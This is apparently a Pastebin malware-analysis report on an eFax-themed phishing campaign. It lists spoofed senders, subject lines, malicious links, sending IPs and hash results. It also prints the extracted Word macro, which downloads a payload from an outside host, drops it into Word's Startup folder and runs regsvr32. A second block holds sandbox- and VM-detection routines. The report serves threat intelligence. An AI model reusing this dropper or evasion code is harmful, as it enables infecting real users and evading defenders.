Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Sender
- ========
- eFax j2 Global, Inc. <eFax@shiplawyer.com>
- Subjects
- =========
- You've received efax Notification
- You have received efax Message
- This is efax Notice
- This is an electronic eFax Notice
- You've got eFax Notice
- This is an electronic eFax Notification
- This is eFax Notification
- You've received eFax Notice
- Embedded links
- ===============
- http://cmstephensconsulting.com/7izt/rjdcowboy.php
- http://dbh.dixitninad.com/.well-known/sylvek1978.php
- http://developermurtaza.website/js/wilsonderyeck.php
- http://directoryredlands.com/wp-content/tmeyer42.php
- http://matexpress.com/map/shaneogrady.php
- http://nchr.vn/wp-content/seanbwarbird.php
- http://rva.agentgrowthpartners.com/.well-known/williamw141955.php
- http://sha256.uaround.ru/presentation/wmatthews11.php
- http://socialprofile.in/scopic/walli_sw.php
- http://spsconsultancyservices.com/wp-admin/sti.plus.php
- http://swacvirals.com/wp-admin/walpasley.php
- http://wondarshop.in/assests/zumathe.php
- http://workxpro.co.in/wp-admin/rklug.php
- Email IPs
- ===========
- shiplawyer.com (173-167-51-106-cpennsylvania.hfc.comcastbusiness.net [173.167.51.106])
- shiplawyer.com (rrcs-71-40-138-178.se.biz.rr.com [71.40.138.178])
- shiplawyer.com (24-35-137-143.fidnet.com [24.35.137.143])
- shiplawyer.com (h207.163.117.75.dynamic.ip.windstream.net [75.117.163.207])
- shiplawyer.com (c-73-154-113-150.hsd1.wv.comcast.net [73.154.113.150])
- shiplawyer.com (071-045-160-192.res.spectrum.com [71.45.160.192])
- shiplawyer.com (72-16-245-65.customerip.birch.net [72.16.245.65])
- shiplawyer.com ([76.4.44.68])
- shiplawyer.com (66-188-168-9.dhcp.stcd.mn.charter.com [66.188.168.9])
- shiplawyer.com (64-72-38-48.flntcmtc01.com.sta.suddenlink.net [64.72.38.48])
- shiplawyer.com (static-71-172-32-163.nwrknj.fios.verizon.net [71.172.32.163])
- shiplawyer.com ([206.63.185.26])
- shiplawyer.com (50-255-199-149-static.hfc.comcastbusiness.net [50.255.199.149])
- shiplawyer.com ([12.180.172.18])
- shiplawyer.com ([66.209.42.145])
- shiplawyer.com ([96.71.254.6])
- shiplawyer.com (h121.205.191.173.dynamic.ip.windstream.net [173.191.205.121])
- shiplawyer.com ([199.190.54.215])
- shiplawyer.com (50-252-19-58-static.hfc.comcastbusiness.net [50.252.19.58])
- shiplawyer.com (cpe-75-86-78-26.wi.res.rr.com [75.86.78.26])
- shiplawyer.com (c-24-6-32-99.hsd1.ca.comcast.net [24.6.32.99])
- shiplawyer.com (c-68-37-17-12.hsd1.mi.comcast.net [68.37.17.12])
- shiplawyer.com (h121.205.191.173.dynamic.ip.windstream.net [173.191.205.121])
- shiplawyer.com (rrcs-208-125-27-66.nyc.biz.rr.com [208.125.27.66])
- shiplawyer.com (cpe-104-172-16-234.socal.res.rr.com [104.172.16.234])
- Munin results
- ===============
- _________ _ _ ______ _____ ______
- | | | | | \ | | | | | | \ \ | | | | \ \ /.)
- | | | | | | | | | | | | | | | | | | | | /)\|
- |_| |_| |_| \_|__|_| |_| |_| _|_|_ |_| |_| // /
- /'" "
- Online Hash Checker for Virustotal and Other Services
- Florian Roth - 0.13.0 April 2019
- [+] Found results CSV from previous run: check-results_attach.csv
- [+] Appending results to file: check-results_attach.csv
- [ ] Processing /attach/e_fax_46164.doc ...
- [ ] Processing /attach/e_fax_46164_4616.zip ...
- [+] Processing 2 lines ...
- 1 / 2 > Unknown
- HASH: a8645292476686686c82fe04f5378f7e0d141b2bcf54c89970a18cc366342a1d COMMENT: /attach/e_fax_46164.doc
- RESULT: - / -
- 2 / 2 > Unknown
- HASH: 81b35cdf0d1e8a239641c25dd32165d658992f1a9058190b0ae773fc70bd8725 COMMENT: /attach/e_fax_46164_4616.zip
- RESULT: - / -
- Macro script
- ==============
- Sub AutoopeN(): loYscbk: End Sub
- Sub loYscbk()
- On Error Resume Next
- Set ess = CreateObject(InternetExplorer.Application)
- RSOgEnmZmP.CreateFolder (p)
- ess.Navigate http://maritimelawyers.us/download.html
- State = 0
- Do Until State = 4: DoEvents: State = ess.readyState: Loop
- Dim RlAqIQeVT: RlAqIQeVT = ess.Document.Body.getElementsByTagName(pre).Item(0).innerHTML
- p = Environ(APPDATA) & \Microsoft\Word\Startup\
- Set RSOgEnmZmP = CreateObject(Scripting.FileSystemObject)
- If Not RSOgEnmZmP.FolderExists(p) Then
- RSOgEnmZmP.CreateFolder (p)
- End If
- Randomize
- p = p & Int(Rnd * 999) 1 & F.wll
- Set objFile = RSOgEnmZmP.CreateTextFile(p, True)
- With objFile: For lp = 1 To Len(RlAqIQeVT) Step 2: .Write Chr(CByte(&H & Mid(RlAqIQeVT, lp, 2))): Next: End With: objFile.Close
- Set objWMIService = GetObject(winmgmts:Win32_Process)
- objWMIService.Create regsvr32.exe-sp,,,processid
- MsgBox The document is protected, you will need to specify a password to unlock.
- Dim myUserForm As UserForm1
- Set myUserForm = New UserForm1
- myUserForm.Show
- Application.Quit
- End Sub
- Questionable part of script
- =============================
- Public Sub checkApps()
- printMsg "[*] WordBasic.AppGetNames ..."
- d = False
- tns = Array("vmware", "vmtools", "vbox", "process explorer", "processhacker", "procmon", "visual basic", "fiddler", "wireshark")
- Set ws = GetObject("winmgmts:\\.\root\cimv2")
- Dim names() As String
- ReDim names(WordBasic.AppCount())
- WordBasic.AppGetNames names
- For Each n In names
- For Each tn In tns
- If InStr(LCase(n), tn) > 0 Then
- d = True
- End If
- Next
- Next
- If d Then
- printMsg "DETECTED"
- Else
- printMsg "OK"
- End If
- End Sub
- Public Sub checkAppCount()
- printMsg "[*] Checking WordBasic.AppCount() ..."
- If WordBasic.AppCount() < 50 Then
- printMsg "DETECTED"
- Else
- printMsg "OK"
- End If
- End Sub
- Public Sub checkPreciseFileName()
- printMsg "[*] Checking Precise Filename ..."
- badName = False
- If ActiveDocument.Name <> "Pafish.docm" Then
- badName = True
- End If
- If badName Then
- printMsg "DETECTED"
- Else
- printMsg "OK"
- End If
- End Sub
- Public Sub checkFilenameHash()
- printMsg "[*] Checking Filename Hashname ..."
- hexchars = "0123456789abcdef"
- c = 0
- For i = 1 To Len(ThisDocument.Name)
- s = Mid(LCase(ThisDocument.Name), i, 1)
- If InStr(s, hexchars) > 0 Then
- c = c + 1
- End If
- Next
- If c >= (Len(ThisDocument.Name) - 5) Then
- printMsg "DETECTED"
- Else
- printMsg "OK"
- End If
- End Sub
- Public Sub checkFilenameBad()
- printMsg "[*] Checking Bad Filename ..."
- badName = False
- badNames = Array("malware", "myapp", "sample", ".bin", "mlwr_", "Desktop")
- For Each n In badNames
- If InStr(LCase(ActiveDocument.FullName), n) > 0 Then
- badName = True
- End If
- Next
- If badName Then
- printMsg "DETECTED"
- Else
- printMsg "OK"
- End If
- End Sub
- Public Sub checkTasks()
- printMsg "[*] Checking Application.Tasks.Name ..."
- badTask = False
- badTaskNames = Array("vbox", "vmware", "vxstream", "autoit", "vmtools", "tcpview", "wireshark", "process explorer", "visual basic", "fiddler")
- For Each Task In Application.Tasks
- For Each badTaskName In badTaskNames
- If InStr(LCase(Task.Name), badTaskName) > 0 Then
- badTask = True
- End If
- Next
- Next
- If badTask Then
- printMsg "DETECTED"
- Else
- printMsg "OK"
- End If
- End Sub
- Public Sub checkCores()
- printMsg "[*] Checking Win32_Processor.NumberOfCores ..."
- badCores = 0
- Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
- Set colItems = objWMIService.ExecQuery("Select * from Win32_Processor", , 48)
- For Each objItem In colItems
- If objItem.NumberOfCores < 3 Then
- badCores = True
- End If
- Next
- If badCores Then
- printMsg "DETECTED"
- Else
- printMsg "OK"
- End If
- End Sub
- Public Sub checkBios()
- printMsg "[*] Checking Win32_Bios.SMBIOSBIOSVersion & SerialNumber ..."
- badBios = False
- badBiosNames = Array("virtualbox", "vmware", "kvm")
- Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
- Set colItems = objWMIService.ExecQuery("Select * from Win32_Bios", , 48)
- For Each objItem In colItems
- For Each badName In badBiosNames
- If InStr(LCase(objItem.SMBIOSBIOSVersion), badName) > 0 Then
- badBios = True
- End If
- If InStr(LCase(objItem.SerialNumber), badName) > 0 Then
- badBios = True
- End If
- Next
- Next
- If badBios Then
- printMsg "DETECTED"
- Else
- printMsg "OK"
- End If
- End Sub
- Public Sub checkPnP()
- printMsg "[*] Checking Win32_PnPEntity.DeviceId ..."
- badPNP = False
- badPNPNames = Array("VEN_80EE", "VEN_15AD")
- Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
- Set colItems = objWMIService.ExecQuery("Select * from Win32_PnPEntity", , 48)
- For Each objItem In colItems
- For Each badName In badPNPNames
- If InStr(LCase(objItem.DeviceId), badName) > 0 Then
- badPNP = True
- End If
- Next
- Next
- If badPNP Then
- printMsg "DETECTED"
- Else
- printMsg "OK"
- End If
- End Sub
- Public Sub checkUsername()
- printMsg "[*] Checking Win32_ComputerSystem.Username ..."
- badUsername = False
- badUsernames = Array("admin", "malfind", "sandbox", "test")
- Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
- Set colItems = objWMIService.ExecQuery("Select * from Win32_ComputerSystem", , 48)
- For Each objItem In colItems
- For Each badName In badUsernames
- If InStr(LCase(objItem.UserName), badName) > 0 Then
- badUsername = True
- End If
- Next
- Next
- If badUsername Then
- printMsg "DETECTED"
- Else
- printMsg "OK"
- End If
- End Sub
- Public Sub checkPartOfDomain()
- printMsg "[*] Checking Win32_ComputerSystem.PartOfDomain ..."
- partOfDomain = False
- Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
- Set colItems = objWMIService.ExecQuery("Select * from Win32_ComputerSystem", , 48)
- For Each objItem In colItems
- If objItem.partOfDomain Then
- partOfDomain = True
- End If
- Next
- If partOfDomain Then
- printMsg "OK"
- Else
- printMsg "DETECTED"
- End If
- End Sub
- Public Sub checkZoneIdentifier()
- printMsg "[*] Checking Zone.Identifier ..."
- If CreateObject("Scripting.FileSystemObject").fiLEExistS(ThisDocument.Path & Application.PathSeparator & ThisDocument.Name & ":Zone.Identifier") Then
- printMsg "OK"
- Else
- printMsg "DETECTED"
- End If
- End Sub
- Public Sub checkNbrOfTask()
- printMsg "[*] Checking Application.Tasks.Count ..."
- If Application.Tasks.Count < 3 Then
- printMsg "DETECTED"
- Else
- printMsg "OK"
- End If
- End Sub
- Public Sub checkRecentDocs()
- printMsg "[*] Checking Application.RecentFiles.Count ..."
- If Application.RecentFiles.Count < 3 Then
- printMsg "DETECTED"
- Else
- printMsg "OK"
- End If
- End Sub
- Public Function printMsg(msg)
- ActiveDocument.Range.Text = ActiveDocument.Range.Text & msg
- Set RSOgEnmZmP = CreateObject("Scripting.FileSystemObject")
- outFile = "pafish.log"
- Set objFile = RSOgEnmZmP.CreateTextFile(outFile, True)
- objFile.Write ActiveDocument.Range.Text & msg
- objFile.Close
- End Function
- Public Sub mark()
- Text = ActiveDocument.Range.Text
- toks = Split(Text, vbCr)
- c = 0
- For Each tok In toks
- l = Len(tok)
- If tok = "OK" Then
- ActiveDocument.Range(c, c + l).Font.Color = vbGreen
- End If
- If tok = "DETECTED" Then
- ActiveDocument.Range(c, c + l).Font.Color = vbRed
- End If
- c = c + l + 1
- Next
- ActiveDocument.Range.ParagraphFormat.SpaceBefore = 0
- ActiveDocument.Range.ParagraphFormat.SpaceAfter = 0
- ActiveDocument.Range.Font.Size = 8
- End Sub
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement